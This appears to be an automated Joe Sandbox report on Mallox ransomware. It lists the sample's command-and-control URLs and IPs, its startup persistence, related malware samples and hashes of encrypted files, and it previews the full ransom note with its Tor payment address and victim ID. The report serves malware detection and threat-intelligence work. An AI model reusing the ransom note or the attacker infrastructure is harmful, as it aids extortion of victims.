      http://91.215.85.142/QWEwqdsvsf/ap.phpkxh0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.php0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phplencoded0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phpContent-Type:0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phpkz0%Avira URL Cloudsafe
      http://91.215.85.142/0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.php7xM0%Avira URL Cloudsafe
      http://91.215.85.142/ows0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phpNxw0%Avira URL Cloudsafe
      http://91.215.85.142/QWEwqdsvsf/ap.phppxM0%Avira URL Cloudsafe
      http://api.ipify.orgx32x64%s0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		high
        api.ipify.org
        		104.26.12.205
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://91.215.85.142/QWEwqdsvsf/ap.phptrue
          • Avira URL Cloud: safe
          		unknown
          http://api.ipify.org/false
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://api.ipify.org/?Ransomware Mallox.exe, 00000000.00000003.1435423549.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://91.215.85.142/Ransomware Mallox.exe, 00000000.00000003.1455252517.0000023CAFEA7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.215.85.142/QWEwqdsvsf/ap.phpwshqos.dll7Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517525405.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537835548.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558677864.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1557947339.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1540574771.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1525372800.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1531166316.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545983166.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1533218205.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1516802551.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1522125993.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.215.85.142/QWEwqdsvsf/ap.phpkxhRansomware Mallox.exe, 00000000.00000003.1495367476.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1490580877.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487434442.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487048074.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1494233966.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1496750386.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491235259.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.215.85.142/QWEwqdsvsf/ap.phpyxZRansomware Mallox.exe, 00000000.00000003.1548290712.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546299993.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1542067078.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545040056.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1547580317.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537894611.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1559096802.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558037196.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1549649553.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.215.85.142/QWEwqdsvsf/ap.phpContent-Type:Ransomware Mallox.exefalse
              • Avira URL Cloud: safe
              		unknown
              http://api.ipify.orgaRansomware Mallox.exe, 00000000.00000003.1735001126.0000023CADEA1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://91.215.85.142/QWEwqdsvsf/ap.phplencodedRansomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537835548.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1557947339.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1540574771.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545983166.0000023CAFF0F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referRansomware Mallox.exe, 00000000.00000003.1460333489.0000023CAFF69000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1478330265.0000023CAFF31000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515736964.0000023CAFF28000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1518812177.0000023CAFE76000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1516446126.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1514485603.0000023CAFE88000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1517731549.0000023CAFE7E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1478506610.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1536625865.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546376683.0000023CAFF30000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546792697.0000023CAFF3B000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1514485603.0000023CAFE80000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1518812177.0000023CAFE7E000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1504591726.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491535677.0000023CAFF2F000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://91.215.85.142/QWEwqdsvsf/ap.phpkzRansomware Mallox.exe, 00000000.00000003.1521991452.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.torproject.org/download/Ransomware Mallox.exe, HOW TO BACK FILES.txt571.0.dr, HOW TO BACK FILES.txt661.0.dr, HOW TO BACK FILES.txt5.0.dr, HOW TO BACK FILES.txt13.0.dr, HOW TO BACK FILES.txt624.0.dr, HOW TO BACK FILES.txt317.0.dr, HOW TO BACK FILES.txt323.0.dr, HOW TO BACK FILES.txt50.0.dr, HOW TO BACK FILES.txt366.0.dr, HOW TO BACK FILES.txt169.0.dr, HOW TO BACK FILES.txt413.0.dr, HOW TO BACK FILES.txt370.0.dr, HOW TO BACK FILES.txt307.0.dr, HOW TO BACK FILES.txt369.0.dr, HOW TO BACK FILES.txt773.0.dr, HOW TO BACK FILES.txt98.0.dr, HOW TO BACK FILES.txt714.0.dr, HOW TO BACK FILES.txt757.0.dr, HOW TO BACK FILES.txt65.0.dr, HOW TO BACK FILES.txt186.0.drfalse
                  		high
                  http://91.215.85.142/QWEwqdsvsf/ap.php7xMRansomware Mallox.exe, 00000000.00000003.1511802024.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1521991452.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1515993832.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1505219295.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1509849904.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1507859258.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1508435716.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1512198939.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1507580206.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://91.215.85.142/QWEwqdsvsf/ap.phpNxwRansomware Mallox.exe, 00000000.00000003.1548290712.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1948626824.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1546299993.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1696834790.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1535009034.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1699524403.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1542067078.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1545040056.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1928997675.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1547580317.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1551313529.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1692939049.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1537894611.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1559096802.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1700357889.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1979510307.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1558037196.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1930536289.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1549649553.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1811590111.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1976418160.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://91.215.85.142/owsRansomware Mallox.exe, 00000000.00000003.1455252517.0000023CAFEA7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://91.215.85.142/QWEwqdsvsf/ap.phppxMRansomware Mallox.exe, 00000000.00000003.1495367476.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1490580877.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487434442.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1503545999.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1487048074.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1489751960.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1494233966.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1496750386.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmp, Ransomware Mallox.exe, 00000000.00000003.1491235259.0000023CADEDD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://api.ipify.orgx32x64%sRansomware Mallox.exefalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://api.ipify.orgRansomware Mallox.exe, 00000000.00000003.1735001126.0000023CADEA1000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    104.26.12.205
                    		api.ipify.orgUnited States
                    		13335CLOUDFLARENETUSfalse
                    91.215.85.142
                    		unknownRussian Federation
                    		34665PINDC-ASRUtrue

                    Private

                    IP
                    192.168.2.2
                    192.168.2.1
                    192.168.2.3

                    General Information

                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1549252
                    Start date and time:2024-11-05 13:22:13 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 9m 0s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:Ransomware Mallox.exe
                    Detection:MAL
                    Classification:mal100.rans.spyw.evad.winEXE@12/1242@1/5
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240s for sample files taking high CPU consumption

                    Warnings

                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryDirectoryFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                    • Report size getting too big, too many NtReadFile calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Report size getting too big, too many NtWriteFile calls found.
                    • VT rate limit hit for: Ransomware Mallox.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    07:23:26API Interceptor6x Sleep call for process: Ransomware Mallox.exe modified
                    13:23:51AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW TO BACK FILES.txt

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.26.12.205Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                    • api.ipify.org/
                    perfcc.elfGet hashmaliciousXmrigBrowse
                    • api.ipify.org/
                    SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    hloRQZmlfg.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    file.exeGet hashmaliciousRDPWrap ToolBrowse
                    • api.ipify.org/
                    file.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    file.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    file.exeGet hashmaliciousUnknownBrowse
                    • api.ipify.org/
                    91.215.85.142SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    SecuriteInfo.com.Win32.RansomX-gen.11727.25490.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    _145.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    Hhwsbefq.exeGet hashmaliciousTargeted RansomwareBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    a.bin.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    ozon.bin.exeGet hashmaliciousTargeted Ransomware, TrojanRansomBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php
                    4cGFnkiRf2.exeGet hashmaliciousTargeted RansomwareBrowse
                    • 91.215.85.142/QWEwqdsvsf/ap.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    s-part-0017.t-0009.t-msedge.nethttp://mibc-gtp.bigdatapppp.com/api/mibc-bd/gs/logGet hashmaliciousUnknownBrowse
                    • 13.107.246.45
                    http://azurearc-cdn.top/f15.svgGet hashmaliciousUnknownBrowse
                    • 13.107.246.45
                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                    • 13.107.246.45
                    https://lifetraces.org/wp-cron.phpGet hashmaliciousPhisherBrowse
                    • 13.107.246.45
                    COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 13.107.246.45
                    https://outlook.office.com@www.nescini.com/wp-content/uploads/2024/10/JTe86LlZl2-nfET-jEQ0WO-6.htmGet hashmaliciousHTMLPhisherBrowse
                    • 13.107.246.45
                    https://QBE.fmgconnect.co.uk/login?crn=QBE04487166Get hashmaliciousUnknownBrowse
                    • 13.107.246.45
                    file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                    • 13.107.246.45
                    https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                    • 13.107.246.45
                    2877872483264021301.jsGet hashmaliciousStrela DownloaderBrowse
                    • 13.107.246.45
                    api.ipify.orgCOTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 104.26.12.205
                    REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                    • 104.26.13.205
                    https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                    • 104.26.12.205
                    Shipping documents.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 172.67.74.152
                    DB_DHL_AWB_001833022AD.exeGet hashmaliciousAgentTeslaBrowse
                    • 172.67.74.152
                    Payslip_October_2024.exeGet hashmaliciousAgentTeslaBrowse
                    • 104.26.12.205
                    CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                    • 104.26.13.205
                    CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                    • 104.26.13.205
                    2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                    • 172.67.74.152
                    2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                    • 104.26.13.205

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, StealcBrowse
                    • 104.21.5.155
                    Scan- 00399905 Payment slip.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                    • 104.21.5.155
                    https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                    • 172.67.201.7
                    7000091945.xlsx.exeGet hashmaliciousAzorult, GuLoaderBrowse
                    • 188.114.96.3
                    1q4pQ8ms4w.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    dZJo0ZAVUx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    COTIZACION.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 104.26.12.205
                    3Ri17T8XLh.exeGet hashmaliciousXWormBrowse
                    • 172.67.19.24
                    TEKJ09876545678002.cmd.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                    • 188.114.96.3
                    PINDC-ASRU3cb770h94r.elfGet hashmaliciousOkiruBrowse
                    • 45.145.172.130
                    na.elfGet hashmaliciousMiraiBrowse
                    • 5.188.210.194
                    na.elfGet hashmaliciousMirai, MoobotBrowse
                    • 5.8.21.138
                    lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                    • 80.87.206.189
                    lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                    • 80.87.206.189
                    https://trstwalsecu.com/Get hashmaliciousUnknownBrowse
                    • 91.215.85.16
                    https://metamaskinf.com/Get hashmaliciousUnknownBrowse
                    • 91.215.85.79
                    http://mygovau-service.com/Get hashmaliciousUnknownBrowse
                    • 91.215.85.79
                    PO-001.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23
                    PO #86637.exeGet hashmaliciousFormBookBrowse
                    • 91.215.85.23

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:true
                    Reputation:low
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\IconCacheAcro65536.dat.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):227110
                    Entropy (8bit):7.999065484083436
                    Encrypted:true
                    SSDEEP:6144:lLvP0D6cualIGTUg52M3B3RxrZYCJ+bYR97K:Jv2Bualpx52M3FPrOC6YQ
                    MD5:FE42A6121F6216494AE27D2F8FBDA1AB
                    SHA1:84CBBCDC33990B6079E77DA9110F0CF8A548EBE6
                    SHA-256:511000E1B54F2EAF38F4F313056CA61CCF8D06F760B4D4D7B08F7BC1AEF22163
                    SHA-512:74CF3F92D7F8154F8E8E06F47618E7A64788F7588D41EC488A821615AE728A40898891E9899EE48E70D5CE5372CF4EE7E7D0E2DCAFE0EFBA78CFF909635C718F
                    Malicious:true
                    Reputation:low
                    Preview:...=N)R.M.TRg..D.....N.y.y..8P.n..|..y...G.B.\...E;.3..?.K .....].R.n.P......}..y....W4. ..3b?..t...[...z.D+.*.t..[..= +oV2d...tmq....W...YXwm..hUH.....,+C\vj..k...k.....Os..?..1."...Q..K.q.....j....X%.2...].z...q...........)b.!....P..~..X.(..j.`x....p..LK.+r....c....G...?.z.t.........q...iuj.u1v~...u...\.....e7..'.<......b.j..O.(,."..O..-.M.H7o;..E..d.@...g.KB.o............p%.x.5u...{R.J.<.^.v..7....v...+.....dm7H....0O.....2.0...ff..&W....+.+0.X.h....?....~4.K.....Ud...E....t......n.x...A|..)8Ty/^..D.`...z..7.)^^..^./.,^.>..P.Q'.T...G)........0..X. ..X..r.E..1X.....On/,.O...w{t.I.M.....P\.jt..Q!A.a.....hE..........pN.5.~3..e.Tw..K.OI...{.....=../O...0..G.....n.-M.K!.......e...y.H;o..0a,..*..f[........u)u..7.F.a...2..Y.H...,.bx\......R..".....:.........W.zg.S.........:.i.Y..,rbi)..k.=Y....ud..:*|e.<......d...]}1..6..w=YA...X.V...../.m....,o...w..<.j...2.c.{.}.Q.T..'n.....M..=.T..%.t3h...s.Pf..?.....~....`P/.F..G.X+H.. &.Zv{..x...@.*..g....

                    C:\Documents and Settings\user\Local Settings\Adobe\Acrobat\DC\SharedDataEvents.mallab (copy)

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):12396
                    Entropy (8bit):7.983639665580372
                    Encrypted:false
                    SSDEEP:384:HaxNzdFg6kCzqqUwIz4kSc0f1ZMU8x4nUPPQ:HQpdFg6kNqUtz4f17g4UPPQ
                    MD5:19714F8D67A76D0BDE2438638FDCCDAC
                    SHA1:E48A39FE336C2EDC628A34BA03317D6B05E27D09
                    SHA-256:6598CD1B8044972F280CF3128371A4C2B6052BACEFFA80C1262E910C9401C48E
